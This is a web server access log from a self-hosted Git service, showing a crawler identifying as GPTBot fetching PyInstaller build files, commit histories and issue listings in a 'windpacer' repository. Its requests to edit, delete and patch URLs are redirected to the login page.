"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:18:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 27000] [Gzip 20.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 77831] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 33397] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 31658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 28299] [Gzip 20.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 894] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 53357] [Gzip 27.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 130628] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 27079] [Gzip 20.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 78610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 31774] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14487] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9809] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 9803] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11129] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 59978] [Gzip 16.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:52:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 